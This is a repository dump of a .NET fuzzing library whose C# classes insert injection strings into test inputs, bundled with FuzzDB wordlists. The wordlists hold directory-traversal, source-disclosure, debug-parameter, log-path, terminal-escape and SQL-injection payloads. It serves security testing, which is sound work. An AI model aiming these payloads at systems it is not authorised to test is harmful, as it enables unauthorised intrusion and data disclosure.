│ ├── BasicStringMutationTests.cs
│ ├── ControlCharsInjectiontests.cs
│ ├── FormatStringsInjection.cs
│ ├── JsonInjectionTests.cs
│ ├── ListMemberDuplicationTests.cs
│ ├── ManipulationsTests.csproj
│ ├── NoSqlInjectionTests.cs
│ ├── SqlInjectionTests.cs
│ ├── StringReplacementTests.cs
│ └── XssInjectionTests.cs
├── ModelFuzzer
├── Fuzzer
│ ├── DotnetModelFuzzer.csproj
│ ├── DotnetModelFuzzer.nuspec
│ ├── ManipulationCache.cs
│ ├── Model.cs
│ ├── Models
│ │ ├── HttpRequestModel.cs
│ │ ├── HttpRequestStrategy.cs
│ │ ├── KeyValuePairModel.cs
│ │ ├── KeyValuePairStrategy.cs
│ │ ├── ListModel.cs
│ │ ├── ListStrategy.cs
│ │ ├── StringModel.cs
│ │ └── StringStrategy.cs
│ ├── Strategy.cs
│ ├── Utilities.cs
│ └── XMLFile1.xml
└── FuzzerTests
│ ├── DotnetModelFuzzer.Tests.csproj
│ ├── FuzzerTests.cs
│ ├── HttpRequestFuzzingTest.cs
│ └── UtilitiesTest.cs
├── README.md
└── azure-pipelines.yml
/.github/workflows/dotnetcore.yml:
--------------------------------------------------------------------------------
1 | name: .NET Core
2 |
3 | on:
4 | push:
5 | branches: [ main ]
6 | pull_request:
7 | branches: [ main ]
8 |
9 | jobs:
10 | build:
11 |
12 | runs-on: ubuntu-latest
13 |
14 | steps:
15 | - uses: actions/checkout@v2
16 | - name: Setup .NET Core
17 | uses: actions/setup-dotnet@v1
18 | with:
19 | dotnet-version: 3.1.101
20 | - name: Install dependencies
21 | run: dotnet restore
22 | - name: Build
23 | run: dotnet build --configuration Debug --no-restore DotnetModelFuzzing.sln
24 |
--------------------------------------------------------------------------------
/ExampleApp/ExampleApp.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 | ExampleApp.Program
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 | all
15 | runtime; build; native; contentfiles; analyzers; buildtransitive
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Melissa Benya
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/CollectionManips/ListMemberDuplication.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 |
4 | namespace DotnetModelFuzzer.Manipulations.CollectionManips
5 | {
6 | public class ListMemberDuplication : Manipulation>, IListManipulation
7 | {
8 | public ListMemberDuplication()
9 | {
10 | }
11 |
12 | public ListMemberDuplication(int seed) : base(seed)
13 | {
14 | }
15 |
16 | public override List Manipulate(List input)
17 | {
18 | if (input != null && input.Count > 0)
19 | {
20 | var index = Random.Next(0, input.Count);
21 | input.Add(input[index]);
22 | }
23 |
24 | return input;
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IGenerationManipulation.cs:
--------------------------------------------------------------------------------
1 | namespace DotnetModelFuzzing.Manipulations
2 | {
3 | public interface IGenerationManipulation
4 | {
5 | T Manipulate(T input = default);
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IListManipulation.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 |
3 | namespace DotnetModelFuzzer.Manipulations
4 | {
5 | public interface IListManipulation
6 | {
7 | List Manipulate(List input);
8 | }
9 | }
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IManupulation.cs:
--------------------------------------------------------------------------------
1 | namespace DotnetModelFuzzer.Manipulations
2 | {
3 | public interface IManupulation
4 | {
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/IMutationManipulation.cs:
--------------------------------------------------------------------------------
1 | namespace DotnetModelFuzzer.Manipulations
2 | {
3 | public interface IMutationManipulation
4 | {
5 | T Manipulate(T input);
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/BasicStringGeneration.cs:
--------------------------------------------------------------------------------
1 | using DotnetModelFuzzing.Manipulations;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.StringManips
4 | {
5 | public class BasicStringGeneration : Manipulation, IGenerationManipulation
6 | {
7 | public BasicStringGeneration() : base() { }
8 | public BasicStringGeneration(int seed) : base(seed) { }
9 |
10 | public override string Manipulate(string input = default)
11 | {
12 | int length = Random.Next(0, short.MaxValue);
13 |
14 | return GenerateRandomAsciiString(length);
15 | }
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/BasicStringMutation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.StringManips
4 | {
5 | public class BasicStringMutation : Manipulation, IMutationManipulation
6 | {
7 | public BasicStringMutation() : base() { }
8 | public BasicStringMutation(int seed) : base(seed) { }
9 |
10 | public override string Manipulate(string input)
11 | {
12 | int length = Random.Next(1, short.MaxValue);
13 | var newString = GenerateRandomAsciiString(length);
14 |
15 | if (string.IsNullOrEmpty(input))
16 | return newString;
17 |
18 | int index = Random.Next(0, input.Length);
19 |
20 | return input.Insert(index, newString);
21 | }
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/StringManips/StringReplacement.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.StringManips
4 | {
5 | public class StringReplacement : Manipulation, IMutationManipulation
6 | {
7 | public StringReplacement() : base() { }
8 | public StringReplacement(int seed) : base(seed) { }
9 |
10 | public override string Manipulate(string input = default)
11 | {
12 | if (string.IsNullOrEmpty(input))
13 | return input;
14 |
15 | int length = Random.Next(1, input.Length + 1);
16 | var newString = GenerateRandomAsciiString(length);
17 |
18 | return InsertString(input, newString);
19 | }
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/ControlCharInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
4 | {
5 | public class ControlCharInjection : FuzzDbManipulation, IMutationManipulation
6 | {
7 | private const string BasePath = "control-chars";
8 |
9 | public ControlCharInjection() : base(BasePath)
10 | {
11 | }
12 |
13 | public ControlCharInjection(int seed) : base(seed, BasePath)
14 | {
15 | }
16 |
17 | public override string Manipulate(string input)
18 | {
19 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
20 |
21 | return InsertString(input, attack);
22 | }
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/FormatStringsInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
4 | {
5 | public class FormatStringsInjection : FuzzDbManipulation, IMutationManipulation
6 | {
7 | private const string BasePath = "format-strings";
8 |
9 | public FormatStringsInjection() : base(BasePath)
10 | {
11 | }
12 |
13 | public FormatStringsInjection(int seed) : base(seed, BasePath)
14 | {
15 | }
16 |
17 | public override string Manipulate(string input)
18 | {
19 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
20 |
21 | return InsertString(input, attack);
22 | }
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/JsonInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
4 | {
5 | public class JsonInjection : FuzzDbManipulation, IMutationManipulation
6 | {
7 | private const string BasePath = "json";
8 |
9 | public JsonInjection() : base(BasePath)
10 | {
11 | }
12 |
13 | public JsonInjection(int seed) : base(seed, BasePath)
14 | {
15 | }
16 |
17 | public override string Manipulate(string input)
18 | {
19 | if (ViableInputs == null || ViableInputs.Count == 0)
20 | {
21 | return input;
22 | }
23 |
24 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
25 | return InsertString(input, attack);
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/NoSqlInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 |
4 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
5 | {
6 | public class NoSqlInjection : FuzzDbManipulation, IMutationManipulation
7 | {
8 | private static readonly string BasePath = "no-sql-injection" + Path.DirectorySeparatorChar;
9 |
10 | public NoSqlInjection() : base(BasePath)
11 | {
12 | }
13 |
14 | public NoSqlInjection(int seed) : base(seed, BasePath)
15 | {
16 | }
17 |
18 | public override string Manipulate(string input)
19 | {
20 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
21 |
22 | return InsertString(input, attack);
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/SqlInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 |
4 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
5 | {
6 | public class SqlInjection : FuzzDbManipulation, IMutationManipulation
7 | {
8 | private static readonly string BasePath = "sql-injection" + Path.DirectorySeparatorChar + "detect" + Path.DirectorySeparatorChar;
9 |
10 | public SqlInjection() : base(BasePath)
11 | {
12 | }
13 |
14 | public SqlInjection(int seed) : base(seed, BasePath)
15 | {
16 | }
17 |
18 | public override string Manipulate(string input)
19 | {
20 | if (ViableInputs == null || ViableInputs.Count == 0)
21 | {
22 | return input;
23 | }
24 |
25 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
26 |
27 | return InsertString(input, attack);
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/VulnerabilityManips/XssInjection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace DotnetModelFuzzer.Manipulations.VulnerabilityManips
4 | {
5 | public class XssInjection : FuzzDbManipulation, IMutationManipulation
6 | {
7 | private const string BasePath = "xss";
8 | private static readonly string[] ExcludedFiles = new[] { "html-event-attributes", "JHADDIX_XSS_WITH_CONTEXT.doc", "default-javascript-event-attributes" };
9 |
10 | public XssInjection() : base(BasePath, ExcludedFiles)
11 | {
12 | }
13 |
14 | public XssInjection(int seed) : base(seed, BasePath, ExcludedFiles)
15 | {
16 | }
17 |
18 | public override string Manipulate(string input)
19 | {
20 | var attack = ViableInputs[Random.Next(0, ViableInputs.Count)];
21 |
22 | return InsertString(input, attack);
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/base64encoder.ps1:
--------------------------------------------------------------------------------
1 |
2 | $files = Get-ChildItem "fuzzdb" -Recurse *.txt
3 | foreach ($f in $files){
4 |
5 | $outfile = $f.FullName + ".base64"
6 |
7 | echo $outfile
8 |
9 | $input = Get-Content $f.FullName -Raw
10 |
11 | $input.contains("`n")
12 | $input.contains("`r")
13 |
14 | #$input = $input -replace [System.Environment]::NewLine, "NEWLINEOMG"
15 | #$input = $input -replace '`r`n', "NEWLINEOMG"
16 | #$input = $input -replace '`n', "NEWLINEOMG"
17 | #$input = $input -replace "`r", "NEWLINEOMG"
18 | $base = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($input))
19 |
20 | #echo $base
21 |
22 | Set-Content -Path $outfile $base
23 |
24 | }
25 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/README.md:
--------------------------------------------------------------------------------
1 | FuzzDB Attack Patterns
2 |
3 | **WAF Evasion**
4 | * Regexp security Cheatsheet
5 | * Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonDebugParamNames.txt:
--------------------------------------------------------------------------------
1 | 7357=1
2 | 7357=true
3 | 7357=y
4 | 7357=yes
5 | access=1
6 | access=true
7 | access=y
8 | access=yes
9 | adm=1
10 | adm1n=1
11 | adm1n=true
12 | adm1n=y
13 | adm1n=yes
14 | admin=1
15 | admin=true
16 | admin=y
17 | admin=yes
18 | adm=true
19 | adm=y
20 | adm=yes
21 | dbg=1
22 | dbg=true
23 | dbg=y
24 | dbg=yes
25 | debug=1
26 | debug=true
27 | debug=y
28 | debug=yes
29 | edit=1
30 | edit=true
31 | edit=y
32 | edit=yes
33 | grant=1
34 | grant=true
35 | grant=y
36 | grant=yes
37 | test=1
38 | test=true
39 | test=y
40 | test=yes
41 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonDebugParamNames.txt.base64:
--------------------------------------------------------------------------------
1 | NzM1Nz0xDQo3MzU3PXRydWUNCjczNTc9eQ0KNzM1Nz15ZXMNCmFjY2Vzcz0xDQphY2Nlc3M9dHJ1ZQ0KYWNjZXNzPXkNCmFjY2Vzcz15ZXMNCmFkbT0xDQphZG0xbj0xDQphZG0xbj10cnVlDQphZG0xbj15DQphZG0xbj15ZXMNCmFkbWluPTENCmFkbWluPXRydWUNCmFkbWluPXkNCmFkbWluPXllcw0KYWRtPXRydWUNCmFkbT15DQphZG09eWVzDQpkYmc9MQ0KZGJnPXRydWUNCmRiZz15DQpkYmc9eWVzDQpkZWJ1Zz0xDQpkZWJ1Zz10cnVlDQpkZWJ1Zz15DQpkZWJ1Zz15ZXMNCmVkaXQ9MQ0KZWRpdD10cnVlDQplZGl0PXkNCmVkaXQ9eWVzDQpncmFudD0xDQpncmFudD10cnVlDQpncmFudD15DQpncmFudD15ZXMNCnRlc3Q9MQ0KdGVzdD10cnVlDQp0ZXN0PXkNCnRlc3Q9eWVzDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonMethodNames.txt:
--------------------------------------------------------------------------------
1 | 0
2 | 1
3 | add
4 | admin
5 | alert
6 | alter
7 | auth
8 | authenticate
9 | append
10 | calc
11 | calculate
12 | cancel
13 | change
14 | check
15 | clear
16 | click
17 | clone
18 | close
19 | create
20 | crypt
21 | decrypt
22 | del
23 | delete
24 | demo
25 | disable
26 | dl
27 | download
28 | edit
29 | enable
30 | encrypt
31 | exec
32 | execute
33 | file
34 | focus
35 | get
36 | help
37 | initiate
38 | is
39 | list
40 | load
41 | ls
42 | make
43 | mod
44 | mode
45 | modify
46 | move
47 | new
48 | off
49 | on
50 | open
51 | post
52 | proxy
53 | pull
54 | put
55 | query
56 | read
57 | remove
58 | rename
59 | reset
60 | retrieve
61 | run
62 | save
63 | search
64 | send
65 | shell
66 | show
67 | snd
68 | subtract
69 | test
70 | to
71 | toggle
72 | update
73 | upload
74 | verify
75 | view
76 | vrfy
77 | with
78 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/CommonMethodNames.txt.base64:
--------------------------------------------------------------------------------
1 | MA0KMQ0KYWRkDQphZG1pbg0KYWxlcnQNCmFsdGVyDQphdXRoDQphdXRoZW50aWNhdGUNCmFwcGVuZA0KY2FsYw0KY2FsY3VsYXRlDQpjYW5jZWwNCmNoYW5nZQ0KY2hlY2sNCmNsZWFyDQpjbGljaw0KY2xvbmUNCmNsb3NlDQpjcmVhdGUNCmNyeXB0DQpkZWNyeXB0DQpkZWwNCmRlbGV0ZQ0KZGVtbw0KZGlzYWJsZQ0KZGwNCmRvd25sb2FkDQplZGl0DQplbmFibGUNCmVuY3J5cHQNCmV4ZWMNCmV4ZWN1dGUNCmZpbGUNCmZvY3VzDQpnZXQNCmhlbHANCmluaXRpYXRlDQppcw0KbGlzdA0KbG9hZA0KbHMNCm1ha2UNCm1vZA0KbW9kZQ0KbW9kaWZ5DQptb3ZlDQpuZXcNCm9mZg0Kb24NCm9wZW4NCnBvc3QNCnByb3h5DQpwdWxsDQpwdXQNCnF1ZXJ5DQpyZWFkDQpyZW1vdmUNCnJlbmFtZQ0KcmVzZXQNCnJldHJpZXZlDQpydW4NCnNhdmUNCnNlYXJjaA0Kc2VuZA0Kc2hlbGwNCnNob3cNCnNuZA0Kc3VidHJhY3QNCnRlc3QNCnRvDQp0b2dnbGUNCnVwZGF0ZQ0KdXBsb2FkDQp2ZXJpZnkNCnZpZXcNCnZyZnkNCndpdGgNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/DebugParams.Json.fuzz.txt:
--------------------------------------------------------------------------------
1 | "7357":1
2 | "7357":true
3 | "7357":"y"
4 | "7357":yes"
5 | "access":1
6 | "access":true
7 | "access":"y"
8 | "access":"yes"
9 | "adm":1
10 | "adm":true
11 | "adm":"y"
12 | "adm":"yes"
13 | "adm1n":1
14 | "adm1n":true
15 | "adm1n":y"
16 | "adm1n":"yes"
17 | "admin":1
18 | "admin":true
19 | "admin":"y"
20 | "admin":"yes"
21 | "adm":1
22 | "adm":true
23 | "adm":"y"
24 | "adm":"yes"
25 | "dbg":1
26 | "dbg":true
27 | "dbg":"y"
28 | "dbg":"yes"
29 | "debug":1
30 | "debug":true
31 | "debug":"y"
32 | "debug":"yes"
33 | "edit":1
34 | "edit":true
35 | "edit":"y"
36 | "edit":"yes"
37 | "grant":1
38 | "grant":true
39 | "grant":"y"
40 | "grant":"yes"
41 | "test":1
42 | "test":true
43 | "test":"y"
44 | "test":"yes"
45 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/business-logic/DebugParams.Json.fuzz.txt.base64:
--------------------------------------------------------------------------------
1 | IjczNTciOjENCiI3MzU3Ijp0cnVlDQoiNzM1NyI6InkiDQoiNzM1NyI6eWVzIg0KImFjY2VzcyI6MQ0KImFjY2VzcyI6dHJ1ZQ0KImFjY2VzcyI6InkiDQoiYWNjZXNzIjoieWVzIg0KImFkbSI6MQ0KImFkbSI6dHJ1ZQ0KImFkbSI6InkiDQoiYWRtIjoieWVzIg0KImFkbTFuIjoxDQoiYWRtMW4iOnRydWUNCiJhZG0xbiI6eSINCiJhZG0xbiI6InllcyINCiJhZG1pbiI6MQ0KImFkbWluIjp0cnVlDQoiYWRtaW4iOiJ5Ig0KImFkbWluIjoieWVzIg0KImFkbSI6MQ0KImFkbSI6dHJ1ZQ0KImFkbSI6InkiDQoiYWRtIjoieWVzIg0KImRiZyI6MQ0KImRiZyI6dHJ1ZQ0KImRiZyI6InkiDQoiZGJnIjoieWVzIg0KImRlYnVnIjoxDQoiZGVidWciOnRydWUNCiJkZWJ1ZyI6InkiDQoiZGVidWciOiJ5ZXMiDQoiZWRpdCI6MQ0KImVkaXQiOnRydWUNCiJlZGl0IjoieSINCiJlZGl0IjoieWVzIg0KImdyYW50IjoxDQoiZ3JhbnQiOnRydWUNCiJncmFudCI6InkiDQoiZ3JhbnQiOiJ5ZXMiDQoidGVzdCI6MQ0KInRlc3QiOnRydWUNCiJ0ZXN0IjoieSINCiJ0ZXN0IjoieWVzIg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/imessage.txt:
--------------------------------------------------------------------------------
1 | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/imessage.txt.base64:
--------------------------------------------------------------------------------
1 | UG93ZXLDmeKAnsOZwo/DmeKAnsOZwo/DmMK1w5nigJjDmMKow5nCj8OZ4oCew5nCj8OZ4oCew5jCtcOZ4oCYw5jCqMOZwo/DmMKxw5jCscOZ4oC5IMOgwqXCoyDDoMKlwqNoIMOgwqXCoyDDoMKlwqPDpeKAoOKAlA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/terminal-escape-codes.txt:
--------------------------------------------------------------------------------
1 | Roses are �[0;31mred�[0m, violets are �[0;34mblue. Hope you enjoy terminal hue
2 | But now...�[20Cfor my greatest trick...�[8m
3 | The quic������k brown fo�����������x... [Beeeep]
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/control-chars/terminal-escape-codes.txt.base64:
--------------------------------------------------------------------------------
1 | Um9zZXMgYXJlIBtbMDszMW1yZWQbWzBtLCB2aW9sZXRzIGFyZSAbWzA7MzRtYmx1ZS4gSG9wZSB5b3UgZW5qb3kgdGVybWluYWwgaHVlCkJ1dCBub3cuLi4bWzIwQ2ZvciBteSBncmVhdGVzdCB0cmljay4uLhtbOG0KVGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBdCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-directory/directory-indexing-generic.txt:
--------------------------------------------------------------------------------
1 | /%3f.jsp
2 | /?M=D
3 | /?S=D
4 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
5 | /cgi-bin/test-cgi?/*
6 | /cgi-bin/test-cgi?*
7 | /%00/
8 | /%2e/
9 | /%2f/
10 | /%5c/
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-directory/directory-indexing-generic.txt.base64:
--------------------------------------------------------------------------------
1 | LyUzZi5qc3ANCi8/TT1EDQovP1M9RCANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQovY2dpLWJpbi90ZXN0LWNnaT8vKg0KL2NnaS1iaW4vdGVzdC1jZ2k/Kg0KLyUwMC8NCi8lMmUvDQovJTJmLw0KLyU1Yy8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt:
--------------------------------------------------------------------------------
1 | /apache/logs/error.log
2 | /apache/logs/access.log
3 | /apache/logs/error.log
4 | /apache/logs/access.log
5 | /apache/logs/error.log
6 | /apache/logs/access.log
7 | /etc/httpd/logs/acces_log
8 | /etc/httpd/logs/acces.log
9 | /etc/httpd/logs/error_log
10 | /etc/httpd/logs/error.log
11 | /var/www/logs/access_log
12 | /var/www/logs/access.log
13 | /usr/local/apache/logs/access_log
14 | /usr/local/apache/logs/access.log
15 | /var/log/apache/access_log
16 | /var/log/apache2/access_log
17 | /var/log/apache/access.log
18 | /var/log/apache2/access.log
19 | /var/log/access_log
20 | /var/log/access.log
21 | /var/www/logs/error_log
22 | /var/www/logs/error.log
23 | /usr/local/apache/logs/error_log
24 | /usr/local/apache/logs/error.log
25 | /var/log/apache/error_log
26 | /var/log/apache2/error_log
27 | /var/log/apache/error.log
28 | /var/log/apache2/error.log
29 | /var/log/error_log
30 | /var/log/error.log
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt.base64:
--------------------------------------------------------------------------------
1 | L2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2FwYWNoZS9sb2dzL2Vycm9yLmxvZyANCi9hcGFjaGUvbG9ncy9hY2Nlc3MubG9nIA0KL2V0Yy9odHRwZC9sb2dzL2FjY2VzX2xvZyANCi9ldGMvaHR0cGQvbG9ncy9hY2Nlcy5sb2cgDQovZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nIA0KL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZyANCi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZyANCi92YXIvd3d3L2xvZ3MvYWNjZXNzLmxvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzLmxvZyANCi92YXIvbG9nL2FwYWNoZS9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYXBhY2hlMi9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYXBhY2hlL2FjY2Vzcy5sb2cgDQovdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2cgDQovdmFyL2xvZy9hY2Nlc3NfbG9nIA0KL3Zhci9sb2cvYWNjZXNzLmxvZyANCi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nIA0KL3Zhci93d3cvbG9ncy9lcnJvci5sb2cgDQovdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZyANCi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nIA0KL3Zhci9sb2cvYXBhY2hlL2Vycm9yX2xvZyANCi92YXIvbG9nL2FwYWNoZTIvZXJyb3JfbG9nIA0KL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZyANCi92YXIvbG9nL2FwYWNoZTIvZXJyb3IubG9nIA0KL3Zhci9sb2cvZXJyb3JfbG9nIA0KL3Zhci9sb2cvZXJyb3IubG9nIA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/README.md:
--------------------------------------------------------------------------------
1 | Notes:
2 |
3 | **source-disc-cmd-exec-traversal.txt**
4 |
5 | single directory traversals that have caused showcode or command exec issues in the past
6 |
7 | ``` GET /path/*payload*relative/path/to/target/file/ ```
8 |
9 | **source-disclosure-generic.txt**
10 |
11 | known cross platform source Code, file disclosure attack patterns - append after file or dir path
12 |
13 | **source-disclosure-microsoft.txt**
14 |
15 | microsoft-specific - appends after filename - try the generic list for microsoft, too
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disc-cmd-exec-traversal.txt:
--------------------------------------------------------------------------------
1 | ..%255c
2 | .%5c../..%5c
3 | /..%c0%9v../
4 | /..%c0%af../
5 | /..%255c..%255c
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disc-cmd-exec-traversal.txt.base64:
--------------------------------------------------------------------------------
1 | Li4lMjU1Yw0KLiU1Yy4uLy4uJTVjDQovLi4lYzAlOXYuLi8NCi8uLiVjMCVhZi4uLw0KLy4uJTI1NWMuLiUyNTVjDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-generic.txt:
--------------------------------------------------------------------------------
1 | %70
2 | .%E2%73%70
3 | %2e0
4 | %2e
5 | .
6 | \
7 | ?*
8 | %20
9 | %00
10 | %2f
11 | %5c
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-generic.txt.base64:
--------------------------------------------------------------------------------
1 | JTcwDQouJUUyJTczJTcwDQolMmUwDQolMmUNCi4NClwNCj8qDQolMjANCiUwMA0KJTJmDQolNWMNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-microsoft.txt:
--------------------------------------------------------------------------------
1 | # microsoft-specific appends - try the generic list, too
2 | +.htr
3 | ::DATA$
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/disclosure-source/source-disclosure-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | IyBtaWNyb3NvZnQtc3BlY2lmaWMgYXBwZW5kcyAtIHRyeSB0aGUgZ2VuZXJpYyBsaXN0LCB0b28NCisuaHRyDQo6OkRBVEEkDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/email/invalid-email-addresses.txt:
--------------------------------------------------------------------------------
1 | justastring
2 | email@addrese.com;secondemail@address.com
3 | @address.com
4 | Jacco Van Tuijl
5 | email.address.com
6 | email@address@example.com
7 | #@%^%#$@#$@#.com
8 | .email@address.com
9 | うえあいお@address.com
10 | email.@address.com
11 | email..email@address.com
12 | email@address..com
13 | email@address.com (Jacco van Tuijl)
14 | email@-address.com
15 | email@111.222.333.44444
16 | Abc..123@address.com
17 | “(),:;<>[\]@address.com
18 | jacco"van"tuijl@address.com
19 | jacco\ van"someting"tuijl\example@address.com
20 | “email”@address.com
21 | sql"or"1"="1"or"test@email.com
